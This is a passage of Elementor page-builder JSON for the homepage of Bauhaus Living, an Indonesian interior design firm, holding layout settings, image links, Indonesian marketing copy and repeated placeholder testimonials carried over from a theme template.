":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal 